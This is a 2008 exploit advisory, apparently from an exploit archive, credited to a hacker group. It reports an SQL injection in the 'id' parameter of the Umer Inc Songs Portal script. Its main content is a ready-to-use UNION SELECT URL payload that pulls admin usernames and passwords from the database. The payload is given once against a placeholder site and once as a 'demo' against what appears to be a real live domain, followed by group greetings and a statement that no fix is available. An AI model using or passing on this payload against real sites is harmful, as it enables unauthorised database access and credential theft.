Umer Inc Songs Portal Script (id) SQL Injection Vulnerability

2008-12-12 20:30:10

|| || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|| _ __ __ __ ______ || /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ || /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ || \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ || \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ || \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ || \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ || \ \____/ >> Kings of injection || \/___/ || ||-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| <<!>> Found by : Fisher <<!>> C0ntact : [email protected] <<!>> Groups : InjEctOr5 T3am =======================================================+++++++++++++++++++ Script information+++++++++++++++++======================================================= <<->> script : Songs Portal <<->> download : www.umerinc.com/songs_portal.php =======================================================+++++++++++++++++++++++ Exploit +++++++++++++++++++++++======================================================= <<->> D0rk : ;) <<->> Exploit :>>> :>> http://www.site.com/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- Demo : http://www.umerinc.com/portfolio/aamir/albums.php?id=16+union+select+1,concat(username,0x3a,password),3,4,5+from+admin-- =======================================================++++++++++++++++++++++ Greetz +++++++++++++++++++++++++======================================================= <<->> HCJ,Sniper_Net,broken security ,Cyb3r-1sT & all friends#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.